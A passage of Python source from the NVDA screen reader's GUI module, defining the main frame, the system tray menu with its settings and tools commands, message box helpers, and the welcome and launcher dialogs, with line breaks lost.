Some out of date translations might include .txt files which are now .html files in newer translations. # Therefore, ignore the extension and try both .html and .txt. for tryExt in ("html", "txt"): tryPath = os.path.join(tryDir, "%s.%s" % (fileName, tryExt)) if os.path.isfile(tryPath): return tryPath return None else: # Not localized. if not hasattr(sys, "frozen") and fileName in ("copying.txt", "contributors.txt"): # If running from source, these two files are in the root dir. return os.path.join(NVDA_PATH, "..", fileName) else: return os.path.join(getDocFilePath.rootPath, fileName) getDocFilePath.rootPath = None class MainFrame(wx.Frame): def __init__(self): style = wx.DEFAULT_FRAME_STYLE ^ wx.MAXIMIZE_BOX ^ wx.MINIMIZE_BOX | wx.FRAME_NO_TASKBAR super(MainFrame, self).__init__(None, wx.ID_ANY, versionInfo.name, size=(1,1), style=style) self.Bind(wx.EVT_CLOSE, self.onExitCommand) self.sysTrayIcon = SysTrayIcon(self) #: The focus before the last popup or C{None} if unknown. #: This is only valid before L{prePopup} is called, #: so it should be used as early as possible in any popup that needs it. #: @type: L{NVDAObject} self.prevFocus = None #: The focus ancestors before the last popup or C{None} if unknown. #: @type: list of L{NVDAObject} self.prevFocusAncestors = None # If NVDA has the uiAccess privilege, it can always set the foreground window. 
import systemUtils if not systemUtils.hasUiAccess(): # This makes Windows return to the previous foreground window and also seems to allow NVDA to be brought to the foreground. self.Show() self.Hide() if winUser.isWindowVisible(self.Handle): # HACK: Work around a wx bug where Hide() doesn't actually hide the window, # but IsShown() returns False and Hide() again doesn't fix it. # This seems to happen if the call takes too long. self.Show() self.Hide() def Destroy(self): self.sysTrayIcon.Destroy() super(MainFrame, self).Destroy() def prePopup(self): """Prepare for a popup. This should be called before any dialog or menu which should pop up for the user. L{postPopup} should be called after the dialog or menu has been shown. @postcondition: A dialog or menu may be shown. """ nvdaPid = os.getpid() focus = api.getFocusObject() if focus.processID != nvdaPid: self.prevFocus = focus self.prevFocusAncestors = api.getFocusAncestors() if winUser.getWindowThreadProcessID(winUser.getForegroundWindow())[0] != nvdaPid: # This process is not the foreground process, so bring it to the foreground. self.Raise() def postPopup(self): """Clean up after a popup dialog or menu. This should be called after a dialog or menu was popped up for the user. """ self.prevFocus = None self.prevFocusAncestors = None if not winUser.isWindowVisible(winUser.getForegroundWindow()): # The current foreground window is invisible, so we want to return to the previous foreground window. # Showing and hiding our main window seems to achieve this. self.Show() self.Hide() def showGui(self): # The menu pops up at the location of the mouse, which means it pops up at an unpredictable location. # Therefore, move the mouse to the center of the screen so that the menu will always pop up there. location = api.getDesktopObject().location winUser.setCursorPos(*location.center) self.evaluateUpdatePendingUpdateMenuItemCommand() self.sysTrayIcon.onActivate(None) def onRevertToSavedConfigurationCommand(self,evt): queueHandler.queueFunction(queueHandler.eventQueue,core.resetConfiguration) # Translators: Reported when last saved configuration has been applied by using revert to saved configuration option in NVDA menu. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Configuration applied")) def onRevertToDefaultConfigurationCommand(self,evt): queueHandler.queueFunction(queueHandler.eventQueue,core.resetConfiguration,factoryDefaults=True) # Translators: Reported when configuration has been restored to defaults by using restore configuration to factory defaults item in NVDA menu. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Configuration restored to factory defaults")) def onSaveConfigurationCommand(self,evt): if globalVars.appArgs.secure: # Translators: Reported when current configuration cannot be saved while NVDA is running in secure mode such as in Windows login screen. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Cannot save configuration - NVDA in secure mode")) return try: config.conf.save() # Translators: Reported when current configuration has been saved. queueHandler.queueFunction(queueHandler.eventQueue,ui.message,_("Configuration saved")) except: # Translators: Message shown when current configuration cannot be saved such as when running NVDA from a CD. 
messageBox(_("Could not save configuration - probably read only file system"),_("Error"),wx.OK | wx.ICON_ERROR) def _popupSettingsDialog(self, dialog, *args, **kwargs): if isInMessageBox: return self.prePopup() try: dialog(self, *args, **kwargs).Show() except SettingsDialog.MultiInstanceError: # Translators: Message shown when attempting to open another NVDA settings dialog when one is already open # (example: when trying to open keyboard settings when general settings dialog is open). messageBox(_("An NVDA settings dialog is already open. Please close it first."),_("Error"),style=wx.OK | wx.ICON_ERROR) except MultiCategorySettingsDialog.CategoryUnavailableError: # Translators: Message shown when trying to open an unavailable category of a multi category settings dialog # (example: when trying to open touch interaction settings on an unsupported system). messageBox(_("The settings panel you tried to open is unavailable on this system."),_("Error"),style=wx.OK | wx.ICON_ERROR) self.postPopup() def onDefaultDictionaryCommand(self,evt): # Translators: Title for default speech dictionary dialog. self._popupSettingsDialog(DictionaryDialog,_("Default dictionary"),speechDictHandler.dictionaries["default"]) def onVoiceDictionaryCommand(self,evt): # Translators: Title for voice dictionary for the current voice such as current eSpeak variant. self._popupSettingsDialog(DictionaryDialog,_("Voice dictionary (%s)")%speechDictHandler.dictionaries["voice"].fileName,speechDictHandler.dictionaries["voice"]) def onTemporaryDictionaryCommand(self,evt): # Translators: Title for temporary speech dictionary dialog (the voice dictionary that is active as long as NvDA is running). self._popupSettingsDialog(DictionaryDialog,_("Temporary dictionary"),speechDictHandler.dictionaries["temp"]) def onExecuteUpdateCommand(self, evt): if updateCheck and updateCheck.isPendingUpdate(): destPath, version, apiVersion, backCompatToAPIVersion = updateCheck.getPendingUpdate() from addonHandler import getIncompatibleAddons if any(getIncompatibleAddons(apiVersion, backCompatToAPIVersion)): confirmUpdateDialog = updateCheck.UpdateAskInstallDialog( parent=gui.mainFrame, destPath=destPath, version=version, apiVersion=apiVersion, backCompatTo=backCompatToAPIVersion ) gui.runScriptModalDialog(confirmUpdateDialog) else: updateCheck.executePendingUpdate() def evaluateUpdatePendingUpdateMenuItemCommand(self): try: self.sysTrayIcon.menu.Remove(self.sysTrayIcon.installPendingUpdateMenuItem) except: log.debug("Error while removing pending update menu item", exc_info=True) pass if not globalVars.appArgs.secure and updateCheck and updateCheck.isPendingUpdate(): self.sysTrayIcon.menu.Insert(self.sysTrayIcon.installPendingUpdateMenuItemPos,self.sysTrayIcon.installPendingUpdateMenuItem) def onExitCommand(self, evt): if config.conf["general"]["askToExit"]: self.prePopup() d = ExitDialog(self) d.Raise() d.Show() self.postPopup() else: wx.GetApp().ExitMainLoop() def onNVDASettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog) def onGeneralSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, GeneralSettingsPanel) def onSelectSynthesizerCommand(self,evt): self._popupSettingsDialog(SynthesizerSelectionDialog) def onSpeechSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, SpeechSettingsPanel) def onSelectBrailleDisplayCommand(self,evt): self._popupSettingsDialog(BrailleDisplaySelectionDialog) def onBrailleSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, 
BrailleSettingsPanel) def onKeyboardSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, KeyboardSettingsPanel) def onMouseSettingsCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, MouseSettingsPanel) def onTouchInteractionCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, TouchInteractionPanel) def onReviewCursorCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, ReviewCursorPanel) def onInputCompositionCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, InputCompositionPanel) def onObjectPresentationCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, ObjectPresentationPanel) def onBrowseModeCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, BrowseModePanel) def onDocumentFormattingCommand(self,evt): self._popupSettingsDialog(NVDASettingsDialog, DocumentFormattingPanel) def onUwpOcrCommand(self, evt): self._popupSettingsDialog(NVDASettingsDialog, UwpOcrPanel) def onSpeechSymbolsCommand(self, evt): self._popupSettingsDialog(SpeechSymbolsDialog) def onInputGesturesCommand(self, evt): self._popupSettingsDialog(InputGesturesDialog) def onAboutCommand(self,evt): # Translators: The title of the dialog to show about info for NVDA. messageBox(versionInfo.aboutMessage, _("About NVDA"), wx.OK) def onCheckForUpdateCommand(self, evt): updateCheck.UpdateChecker().check() def onViewLogCommand(self, evt): logViewer.activate() def onSpeechViewerEnabled(self, isEnabled): # its possible for this to be called after the sysTrayIcon is destroyed if we are exiting NVDA if self.sysTrayIcon and self.sysTrayIcon.menu_tools_toggleSpeechViewer: self.sysTrayIcon.menu_tools_toggleSpeechViewer.Check(isEnabled) def onToggleSpeechViewerCommand(self, evt): if not speechViewer.isActive: speechViewer.activate() else: speechViewer.deactivate() def onBrailleViewerChangedState(self, created): # its possible for this to be called after the sysTrayIcon is destroyed if we are exiting NVDA if self.sysTrayIcon and self.sysTrayIcon.menu_tools_toggleBrailleViewer: self.sysTrayIcon.menu_tools_toggleBrailleViewer.Check(created) def onToggleBrailleViewerCommand(self, evt): import brailleViewer if brailleViewer.isBrailleViewerActive(): brailleViewer.destroyBrailleViewer() else: brailleViewer.createBrailleViewerTool() def onPythonConsoleCommand(self, evt): import pythonConsole if not pythonConsole.consoleUI: pythonConsole.initialize() pythonConsole.activate() def onAddonsManagerCommand(self,evt): if isInMessageBox: return self.prePopup() from .addonGui import AddonsDialog d=AddonsDialog(gui.mainFrame) d.Show() self.postPopup() def onReloadPluginsCommand(self, evt): import appModuleHandler, globalPluginHandler from NVDAObjects import NVDAObject appModuleHandler.reloadAppModules() globalPluginHandler.reloadGlobalPlugins() NVDAObject.clearDynamicClassCache() def onCreatePortableCopyCommand(self,evt): if isInMessageBox: return self.prePopup() import gui.installerGui d=gui.installerGui.PortableCreaterDialog(gui.mainFrame) d.Show() self.postPopup() def onInstallCommand(self, evt): if isInMessageBox: return from gui import installerGui installerGui.showInstallGui() def onRunCOMRegistrationFixesCommand(self, evt): if isInMessageBox: return if gui.messageBox( # Translators: A message to warn the user when starting the COM Registration Fixing tool _("You are about to run the COM Registration Fixing tool. 
This tool will try to fix common system problems that stop NVDA from being able to access content in many programs including Firefox and Internet Explorer. This tool must make changes to the System registry and therefore requires administrative access. Are you sure you wish to proceed?"), # Translators: The title of the warning dialog displayed when launching the COM Registration Fixing tool _("Warning"),wx.YES|wx.NO|wx.ICON_WARNING,self )==wx.NO: return progressDialog = IndeterminateProgressDialog(mainFrame, # Translators: The title of the dialog presented while NVDA is running the COM Registration fixing tool _("COM Registration Fixing Tool"), # Translators: The message displayed while NVDA is running the COM Registration fixing tool _("Please wait while NVDA tries to fix your system's COM registrations.") ) try: import systemUtils systemUtils.execElevated(config.SLAVE_FILENAME, ["fixCOMRegistrations"]) except: log.error("Could not execute fixCOMRegistrations command",exc_info=True) progressDialog.done() del progressDialog # Translators: The message displayed when the COM Registration Fixing tool completes. gui.messageBox(_("COM Registration Fixing tool complete"), # Translators: The title of a dialog presented when the COM Registration Fixing tool is complete. _("COM Registration Fixing Tool"), wx.OK) def onConfigProfilesCommand(self, evt): if isInMessageBox: return self.prePopup() from .configProfiles import ProfilesDialog ProfilesDialog(gui.mainFrame).Show() self.postPopup() class SysTrayIcon(wx.adv.TaskBarIcon): def __init__(self, frame): super(SysTrayIcon, self).__init__() icon=wx.Icon(ICON_PATH,wx.BITMAP_TYPE_ICO) self.SetIcon(icon, versionInfo.name) self.menu=wx.Menu() menu_preferences=self.preferencesMenu=wx.Menu() item = menu_preferences.Append(wx.ID_ANY, # Translators: The label for the menu item to open NVDA Settings dialog. _("&Settings..."), # Translators: The description for the menu item to open NVDA Settings dialog. _("NVDA settings")) self.Bind(wx.EVT_MENU, frame.onNVDASettingsCommand, item) subMenu_speechDicts = wx.Menu() if not globalVars.appArgs.secure: item = subMenu_speechDicts.Append( wx.ID_ANY, # Translators: The label for the menu item to open Default speech dictionary dialog. _("&Default dictionary..."), # Translators: The help text for the menu item to open Default speech dictionary dialog. _("A dialog where you can set default dictionary by adding dictionary entries to the list") ) self.Bind(wx.EVT_MENU, frame.onDefaultDictionaryCommand, item) item = subMenu_speechDicts.Append( wx.ID_ANY, # Translators: The label for the menu item to open Voice specific speech dictionary dialog. _("&Voice dictionary..."), _( # Translators: The help text for the menu item # to open Voice specific speech dictionary dialog. "A dialog where you can set voice-specific dictionary by adding" " dictionary entries to the list" ) ) self.Bind(wx.EVT_MENU, frame.onVoiceDictionaryCommand, item) item = subMenu_speechDicts.Append( wx.ID_ANY, # Translators: The label for the menu item to open Temporary speech dictionary dialog. _("&Temporary dictionary..."), # Translators: The help text for the menu item to open Temporary speech dictionary dialog. _("A dialog where you can set temporary dictionary by adding dictionary entries to the edit box") ) self.Bind(wx.EVT_MENU, frame.onTemporaryDictionaryCommand, item) # Translators: The label for a submenu under NvDA Preferences menu to select speech dictionaries. 
menu_preferences.AppendSubMenu(subMenu_speechDicts,_("Speech &dictionaries")) if not globalVars.appArgs.secure: # Translators: The label for the menu item to open Punctuation/symbol pronunciation dialog. item = menu_preferences.Append(wx.ID_ANY, _("&Punctuation/symbol pronunciation...")) self.Bind(wx.EVT_MENU, frame.onSpeechSymbolsCommand, item) # Translators: The label for the menu item to open the Input Gestures dialog. item = menu_preferences.Append(wx.ID_ANY, _("I&nput gestures...")) self.Bind(wx.EVT_MENU, frame.onInputGesturesCommand, item) # Translators: The label for Preferences submenu in NVDA menu. self.menu.AppendSubMenu(menu_preferences,_("&Preferences")) menu_tools = self.toolsMenu = wx.Menu() if not globalVars.appArgs.secure: # Translators: The label for the menu item to open NVDA Log Viewer. item = menu_tools.Append(wx.ID_ANY, _("View log")) self.Bind(wx.EVT_MENU, frame.onViewLogCommand, item) # Translators: The label for the menu item to toggle Speech Viewer. item=self.menu_tools_toggleSpeechViewer = menu_tools.AppendCheckItem(wx.ID_ANY, _("Speech viewer")) self.Bind(wx.EVT_MENU, frame.onToggleSpeechViewerCommand, item) self.menu_tools_toggleBrailleViewer: wx.MenuItem = menu_tools.AppendCheckItem( wx.ID_ANY, # Translators: The label for the menu item to toggle Braille Viewer. _("Braille viewer") ) item = self.menu_tools_toggleBrailleViewer self.Bind(wx.EVT_MENU, frame.onToggleBrailleViewerCommand, item) import brailleViewer self.menu_tools_toggleBrailleViewer.Check(brailleViewer.isBrailleViewerActive()) brailleViewer.postBrailleViewerToolToggledAction.register(frame.onBrailleViewerChangedState) if not globalVars.appArgs.secure and not config.isAppX: # Translators: The label for the menu item to open NVDA Python Console. item = menu_tools.Append(wx.ID_ANY, _("Python console")) self.Bind(wx.EVT_MENU, frame.onPythonConsoleCommand, item) # Translators: The label of a menu item to open the Add-ons Manager. item = menu_tools.Append(wx.ID_ANY, _("Manage &add-ons...")) self.Bind(wx.EVT_MENU, frame.onAddonsManagerCommand, item) if not globalVars.appArgs.secure and not config.isAppX and getattr(sys,'frozen',None): # Translators: The label for the menu item to create a portable copy of NVDA from an installed or another portable version. item = menu_tools.Append(wx.ID_ANY, _("Create portable copy...")) self.Bind(wx.EVT_MENU, frame.onCreatePortableCopyCommand, item) if not config.isInstalledCopy(): # Translators: The label for the menu item to install NVDA on the computer. item = menu_tools.Append(wx.ID_ANY, _("&Install NVDA...")) self.Bind(wx.EVT_MENU, frame.onInstallCommand, item) # Translators: The label for the menu item to run the COM registration fix tool item = menu_tools.Append(wx.ID_ANY, _("Run COM Registration Fixing tool...")) self.Bind(wx.EVT_MENU, frame.onRunCOMRegistrationFixesCommand, item) if not config.isAppX: # Translators: The label for the menu item to reload plugins. item = menu_tools.Append(wx.ID_ANY, _("Reload plugins")) self.Bind(wx.EVT_MENU, frame.onReloadPluginsCommand, item) # Translators: The label for the Tools submenu in NVDA menu. self.menu.AppendSubMenu(menu_tools,_("Tools")) menu_help = self.helpMenu = wx.Menu() if not globalVars.appArgs.secure: # Translators: The label of a menu item to open NVDA user guide. item = menu_help.Append(wx.ID_ANY, _("&User Guide")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("userGuide.html")), item) # Translators: The label of a menu item to open the Commands Quick Reference document. 
item = menu_help.Append(wx.ID_ANY, _("Commands &Quick Reference")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("keyCommands.html")), item) # Translators: The label for the menu item to open What's New document. item = menu_help.Append(wx.ID_ANY, _("What's &new")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("changes.html")), item) item = menu_help.Append(wx.ID_ANY, _("NVDA &web site")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile("http://www.nvda-project.org/"), item) # Translators: The label for the menu item to view NVDA License document. item = menu_help.Append(wx.ID_ANY, _("L&icense")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("copying.txt", False)), item) # Translators: The label for the menu item to view NVDA Contributors list document. item = menu_help.Append(wx.ID_ANY, _("C&ontributors")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(getDocFilePath("contributors.txt", False)), item) # Translators: The label for the menu item to open NVDA Welcome Dialog. item = menu_help.Append(wx.ID_ANY, _("We&lcome dialog...")) self.Bind(wx.EVT_MENU, lambda evt: WelcomeDialog.run(), item) menu_help.AppendSeparator() if updateCheck: # Translators: The label of a menu item to manually check for an updated version of NVDA. item = menu_help.Append(wx.ID_ANY, _("&Check for update...")) self.Bind(wx.EVT_MENU, frame.onCheckForUpdateCommand, item) # Translators: The label for the menu item to open About dialog to get information about NVDA. item = menu_help.Append(wx.ID_ABOUT, _("About..."), _("About NVDA")) self.Bind(wx.EVT_MENU, frame.onAboutCommand, item) # Translators: The label for the Help submenu in NVDA menu. self.menu.AppendSubMenu(menu_help,_("&Help")) self.menu.AppendSeparator() # Translators: The label for the menu item to open the Configuration Profiles dialog. item = self.menu.Append(wx.ID_ANY, _("&Configuration profiles...")) self.Bind(wx.EVT_MENU, frame.onConfigProfilesCommand, item) # Translators: The label for the menu item to revert to saved configuration. item = self.menu.Append(wx.ID_ANY, _("&Revert to saved configuration"),_("Reset all settings to saved state")) self.Bind(wx.EVT_MENU, frame.onRevertToSavedConfigurationCommand, item) if not globalVars.appArgs.secure: # Translators: The label for the menu item to reset settings to default settings. # Here, default settings means settings that were there when the user first used NVDA. item = self.menu.Append(wx.ID_ANY, _("&Reset configuration to factory defaults"),_("Reset all settings to default state")) self.Bind(wx.EVT_MENU, frame.onRevertToDefaultConfigurationCommand, item) # Translators: The label for the menu item to save current settings. item = self.menu.Append(wx.ID_SAVE, _("&Save configuration"), _("Write the current configuration to nvda.ini")) self.Bind(wx.EVT_MENU, frame.onSaveConfigurationCommand, item) self.menu.AppendSeparator() # Translators: The label for the menu item to open donate page. item = self.menu.Append(wx.ID_ANY, _("Donate")) self.Bind(wx.EVT_MENU, lambda evt: os.startfile(DONATE_URL), item) self.installPendingUpdateMenuItemPos = self.menu.GetMenuItemCount() item = self.installPendingUpdateMenuItem = self.menu.Append(wx.ID_ANY, # Translators: The label for the menu item to run a pending update. _("Install pending &update"), # Translators: The description for the menu item to run a pending update. 
_("Execute a previously downloaded NVDA update")) self.Bind(wx.EVT_MENU, frame.onExecuteUpdateCommand, item) self.menu.AppendSeparator() item = self.menu.Append(wx.ID_EXIT, _("E&xit"),_("Exit NVDA")) self.Bind(wx.EVT_MENU, frame.onExitCommand, item) self.Bind(wx.adv.EVT_TASKBAR_LEFT_DOWN, self.onActivate) self.Bind(wx.adv.EVT_TASKBAR_RIGHT_DOWN, self.onActivate) def Destroy(self): self.menu.Destroy() super(SysTrayIcon, self).Destroy() def onActivate(self, evt): mainFrame.prePopup() import appModules.nvda if not appModules.nvda.nvdaMenuIaIdentity: # The NVDA app module doesn't know how to identify the NVDA menu yet. # Signal that the NVDA menu has just been opened. appModules.nvda.nvdaMenuIaIdentity = True self.PopupMenu(self.menu) if appModules.nvda.nvdaMenuIaIdentity is True: # The NVDA menu didn't actually appear for some reason. appModules.nvda.nvdaMenuIaIdentity = None mainFrame.postPopup() def initialize(): global mainFrame if mainFrame: raise RuntimeError("GUI already initialized") mainFrame = MainFrame() wx.GetApp().SetTopWindow(mainFrame) # In wxPython >= 4.1, # wx.CallAfter no longer executes callbacks while NVDA's main thread is within apopup menu or message box. # To work around this, # Monkeypatch wx.CallAfter to # post a WM_NULL message to our top-level window after calling the original CallAfter, # which causes wx's event loop to wake up enough to execute the callback. old_wx_CallAfter = wx.CallAfter def wx_CallAfter_wrapper(func, *args, **kwargs): old_wx_CallAfter(func, *args, **kwargs) # mainFrame may be None as NVDA could be terminating. topHandle = mainFrame.Handle if mainFrame else None if topHandle: winUser.PostMessage(topHandle, winUser.WM_NULL, 0, 0) wx.CallAfter = wx_CallAfter_wrapper def terminate(): import brailleViewer brailleViewer.destroyBrailleViewer() for instance, state in gui.SettingsDialog._instances.items(): if state is gui.SettingsDialog._DIALOG_DESTROYED_STATE: log.error( "Destroyed but not deleted instance of settings dialog exists: {!r}".format(instance) ) else: log.debug("Exiting NVDA with an open settings dialog: {!r}".format(instance)) global mainFrame # This is called after the main loop exits because WM_QUIT exits the main loop # without destroying all objects correctly and we need to support WM_QUIT. # Therefore, any request to exit should exit the main loop. wx.CallAfter(mainFrame.Destroy) # #4460: We need another iteration of the main loop # so that everything (especially the TaskBarIcon) is cleaned up properly. # ProcessPendingEvents doesn't seem to work, but MainLoop does. # Because the top window gets destroyed, # MainLoop thankfully returns pretty quickly. wx.GetApp().MainLoop() mainFrame = None def showGui(): wx.CallAfter(mainFrame.showGui) def quit(): wx.CallAfter(mainFrame.onExitCommand, None) def messageBox(message, caption=wx.MessageBoxCaptionStr, style=wx.OK | wx.CENTER, parent=None): """Display a message dialog. This should be used for all message dialogs rather than using C{wx.MessageDialog} and C{wx.MessageBox} directly. @param message: The message text. @type message: str @param caption: The caption (title) of the dialog. @type caption: str @param style: Same as for wx.MessageBox. @type style: int @param parent: The parent window (optional). @type parent: C{wx.Window} @return: Same as for wx.MessageBox. 
@rtype: int """ global isInMessageBox wasAlready = isInMessageBox isInMessageBox = True if not parent: mainFrame.prePopup() res = wx.MessageBox(message, caption, style, parent or mainFrame) if not parent: mainFrame.postPopup() if not wasAlready: isInMessageBox = False return res def runScriptModalDialog(dialog, callback=None): """Run a modal dialog from a script. This will not block the caller, but will instead call C{callback} (if provided) with the result from the dialog. The dialog will be destroyed once the callback has returned. @param dialog: The dialog to show. @type dialog: C{wx.Dialog} @param callback: The optional callable to call with the result from the dialog. @type callback: callable """ def run(): mainFrame.prePopup() res = dialog.ShowModal() mainFrame.postPopup() if callback: callback(res) dialog.Destroy() wx.CallAfter(run) class WelcomeDialog( _ContextHelpMixin, wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO ): """The NVDA welcome dialog. This provides essential information for new users, such as a description of the NVDA key and instructions on how to activate the NVDA menu. It also provides quick access to some important configuration options. This dialog is displayed the first time NVDA is started with a new configuration. """ helpId = "WelcomeDialog" WELCOME_MESSAGE_DETAIL = _( # Translators: The main message for the Welcome dialog when the user starts NVDA for the first time. "Most commands for controlling NVDA require you to hold down" " the NVDA key while pressing other keys.\n" "By default, the numpad Insert and main Insert keys may both be used as the NVDA key.\n" "You can also configure NVDA to use the CapsLock as the NVDA key.\n" "Press NVDA+n at any time to activate the NVDA menu.\n" "From this menu, you can configure NVDA, get help and access other NVDA functions." ) def __init__(self, parent): # Translators: The title of the Welcome dialog when user starts NVDA for the first time. super(WelcomeDialog, self).__init__(parent, wx.ID_ANY, _("Welcome to NVDA")) mainSizer=wx.BoxSizer(wx.VERTICAL) # Translators: The header for the Welcome dialog when user starts NVDA for the first time. This is in larger, # bold lettering welcomeTextHeader = wx.StaticText(self, label=_("Welcome to NVDA!")) welcomeTextHeader.SetFont(wx.Font(18, wx.FONTFAMILY_DEFAULT, wx.NORMAL, wx.BOLD)) mainSizer.AddSpacer(guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS) mainSizer.Add(welcomeTextHeader,border=20,flag=wx.EXPAND|wx.LEFT|wx.RIGHT) mainSizer.AddSpacer(guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS) welcomeTextDetail = wx.StaticText(self, wx.ID_ANY, self.WELCOME_MESSAGE_DETAIL) mainSizer.Add(welcomeTextDetail,border=20,flag=wx.EXPAND|wx.LEFT|wx.RIGHT) optionsSizer = wx.StaticBoxSizer( wx.StaticBox( self, # Translators: The label for a group box containing the NVDA welcome dialog options. label=_("Options") ), wx.VERTICAL ) sHelper = guiHelper.BoxSizerHelper(self, sizer=optionsSizer) # Translators: The label of a combobox in the Welcome dialog. 
kbdLabelText = _("&Keyboard layout:") layouts = keyboardHandler.KeyboardInputGesture.LAYOUTS self.kbdNames = sorted(layouts) kbdChoices = [layouts[layout] for layout in self.kbdNames] self.kbdList = sHelper.addLabeledControl(kbdLabelText, wx.Choice, choices=kbdChoices) try: index = self.kbdNames.index(config.conf["keyboard"]["keyboardLayout"]) self.kbdList.SetSelection(index) except: log.error("Could not set Keyboard layout list to current layout",exc_info=True) # Translators: The label of a checkbox in the Welcome dialog. capsAsNVDAModifierText = _("&Use CapsLock as an NVDA modifier key") self.capsAsNVDAModifierCheckBox = sHelper.addItem(wx.CheckBox(self, label=capsAsNVDAModifierText)) self.capsAsNVDAModifierCheckBox.SetValue(config.conf["keyboard"]["useCapsLockAsNVDAModifierKey"]) # Translators: The label of a checkbox in the Welcome dialog. startAfterLogonText = _("St&art NVDA after I sign in") self.startAfterLogonCheckBox = sHelper.addItem(wx.CheckBox(self, label=startAfterLogonText)) self.startAfterLogonCheckBox.Value = config.getStartAfterLogon() if globalVars.appArgs.secure or config.isAppX or not config.isInstalledCopy(): self.startAfterLogonCheckBox.Disable() # Translators: The label of a checkbox in the Welcome dialog. showWelcomeDialogAtStartupText = _("&Show this dialog when NVDA starts") self.showWelcomeDialogAtStartupCheckBox = sHelper.addItem(wx.CheckBox(self, label=showWelcomeDialogAtStartupText)) self.showWelcomeDialogAtStartupCheckBox.SetValue(config.conf["general"]["showWelcomeDialogAtStartup"]) mainSizer.Add(optionsSizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) mainSizer.Add(self.CreateButtonSizer(wx.OK), border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL|wx.ALIGN_RIGHT) self.Bind(wx.EVT_BUTTON, self.onOk, id=wx.ID_OK) mainSizer.Fit(self) self.SetSizer(mainSizer) self.kbdList.SetFocus() self.CentreOnScreen() def onOk(self, evt): layout = self.kbdNames[self.kbdList.GetSelection()] config.conf["keyboard"]["keyboardLayout"] = layout config.conf["keyboard"]["useCapsLockAsNVDAModifierKey"] = self.capsAsNVDAModifierCheckBox.IsChecked() if self.startAfterLogonCheckBox.Enabled: config.setStartAfterLogon(self.startAfterLogonCheckBox.Value) config.conf["general"]["showWelcomeDialogAtStartup"] = self.showWelcomeDialogAtStartupCheckBox.IsChecked() try: config.conf.save() except: log.debugWarning("Could not save",exc_info=True) self.EndModal(wx.ID_OK) @classmethod def run(cls): """Prepare and display an instance of this dialog. This does not require the dialog to be instantiated. """ mainFrame.prePopup() d = cls(mainFrame) d.ShowModal() d.Destroy() mainFrame.postPopup() class LauncherDialog( _ContextHelpMixin, wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO ): """The dialog that is displayed when NVDA is started from the launcher. This displays the license and allows the user to install or create a portable copy of NVDA. """ helpId = "InstallingNVDA" def __init__(self, parent): super(LauncherDialog, self).__init__(parent, title=versionInfo.name) mainSizer = wx.BoxSizer(wx.VERTICAL) sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL) # Translators: The label of the license text which will be shown when NVDA installation program starts. 
groupLabel = _("License Agreement") sizer = sHelper.addItem(wx.StaticBoxSizer(wx.StaticBox(self, label=groupLabel), wx.VERTICAL)) licenseTextCtrl = wx.TextCtrl(self, size=(500, 400), style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_RICH) licenseTextCtrl.Value = codecs.open(getDocFilePath("copying.txt", False), "r", encoding="UTF-8").read() sizer.Add(licenseTextCtrl) # Translators: The label for a checkbox in NvDA installation program to agree to the license agreement. agreeText = _("I &agree") self.licenseAgreeCheckbox = sHelper.addItem(wx.CheckBox(self, label=agreeText)) self.licenseAgreeCheckbox.Value = False self.licenseAgreeCheckbox.Bind(wx.EVT_CHECKBOX, self.onLicenseAgree) sizer = sHelper.addItem(wx.GridSizer(2, 2, 0, 0)) self.actionButtons = [] # Translators: The label of the button in NVDA installation program to install NvDA on the user's computer. ctrl = wx.Button(self, label=_("&Install NVDA on this computer")) sizer.Add(ctrl) ctrl.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(evt, mainFrame.onInstallCommand)) self.actionButtons.append(ctrl) # Translators: The label of the button in NVDA installation program to create a portable version of NVDA. ctrl = wx.Button(self, label=_("Create &portable copy")) sizer.Add(ctrl) ctrl.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(evt, mainFrame.onCreatePortableCopyCommand)) self.actionButtons.append(ctrl) # Translators: The label of the button in NVDA installation program to continue using the installation program as a temporary copy of NVDA. ctrl = wx.Button(self, label=_("&Continue running")) sizer.Add(ctrl) ctrl.Bind(wx.EVT_BUTTON, self.onContinueRunning) self.actionButtons.append(ctrl) sizer.Add(wx.Button(self, label=_("E&xit"), id=wx.ID_CANCEL)) # If we bind this on the button, it fails to trigger when the dialog is closed. self.Bind(wx.EVT_BUTTON, self.onExit, id=wx.ID_CANCEL) for ctrl in self.actionButtons: ctrl.Disable() mainSizer.Add(sHelper.sizer, border = guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL) self.Sizer = mainSizer mainSizer.Fit(self) self.CentreOnScreen() def onLicenseAgree(self, evt): for ctrl in self.actionButtons: ctrl.Enable(evt.IsChecked()) def onAction(self, evt, func): self.Destroy() func(evt) def onContinueRunning(self, evt): self.Destroy() core.doStartupDialogs() def onExit(self, evt): wx.GetApp().ExitMainLoop() @classmethod def run(cls): """Prepare and display an instance of this dialog. This does not require the dialog to be instantiated. """ mainFrame.prePopup() d = cls(mainFrame) 